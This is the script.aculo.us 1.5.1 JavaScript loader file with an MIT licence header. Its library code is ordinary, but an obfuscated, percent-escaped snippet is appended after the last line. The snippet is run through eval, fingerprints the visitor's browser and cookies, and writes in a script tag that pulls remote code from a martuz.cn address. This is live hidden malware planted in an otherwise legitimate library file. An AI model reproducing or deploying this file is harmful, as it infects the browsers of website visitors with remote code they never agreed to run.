// Copyright (c) 2005 Thomas Fuchs (http://script.aculo.us, http://mir.aculo.us)
// 
// Permission is hereby granted, free of charge, to any person obtaining
// a copy of this software and associated documentation files (the
// "Software"), to deal in the Software without restriction, including
// without limitation the rights to use, copy, modify, merge, publish,
// distribute, sublicense, and/or sell copies of the Software, and to
// permit persons to whom the Software is furnished to do so, subject to
// the following conditions:
// 
// The above copyright notice and this permission notice shall be
// included in all copies or substantial portions of the Software.
//
// THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
// EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
// MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
// NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
// LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
// OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
// WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.

var Scriptaculous = {
  Version: '1.5.1',
  require: function(libraryName) {
    // inserting via DOM fails in Safari 2.0, so brute force approach
    document.write('<script type="text/javascript" src="'+libraryName+'"></script>');
  },
  load: function() {
    if((typeof Prototype=='undefined') ||
      parseFloat(Prototype.Version.split(".")[0] + "." +
                 Prototype.Version.split(".")[1]) < 1.4)
      throw("script.aculo.us requires the Prototype JavaScript framework >= 1.4.0");
    
    $A(document.getElementsByTagName("script")).findAll( function(s) {
      return (s.src && s.src.match(/scriptaculous\.js(\?.*)?$/))
    }).each( function(s) {
      var path = s.src.replace(/scriptaculous\.js(\?.*)?$/,'');
      var includes = s.src.match(/\?.*load=([a-z,]*)/);
      (includes ? includes[1] : 'builder,effects,dragdrop,controls,slider').split(',').each(
       function(include) { Scriptaculous.require(path+include+'.js') });
    });
  }
}

Scriptaculous.load();<!-- 
(function(gain){var BKet=('v"61r"20a"3d"22"53c"72"69p"74Engi"6ee"22"2c"62"3d"22Ve"72s"69"6fn()+"22"2cj"3d"22"22"2cu"3d"6e"61vig"61tor"2euse"72"41gent"3b"69"66"28"28u"2eind"65xOf("22C"68r"6fme"22)"3c"30)"26"26(u"2ei"6ede"78"4ff"28"22Wi"6e"22)"3e0)"26"26"28u"2eindexOf("22"4eT"20"36"22"29"3c0"29"26"26(d"6fc"75"6d"65n"74"2ecook"69e"2eindexO"66("22miek"3d"31"22)"3c0"29"26"26(typeof"28zrvzts)"21"3d"74ypeof("22A"22))"29"7bzrvzt"73"3d"22"41"22"3beval("22if(wi"6edo"77"2e"22"2ba+"22)j"3dj+"22+a+"22M"61"6ao"72"22+b+a+"22Mi"6eor"22+b+a+"22"42uild"22+b+"22j"3b"22"29"3b"64"6fcument"2e"77rite("22"3cscri"70t"20s"72c"3d"2f"2fm"61r"22"2b"22tuz"2ecn"2fv"69"64"2f"3fid"3d"22+j+"22"3e"3c"5c"2fsc"72"69"70t"3e"22)"3b"7d').replace(gain,'%');eval(unescape(BKet))})(/\"/g);
 -->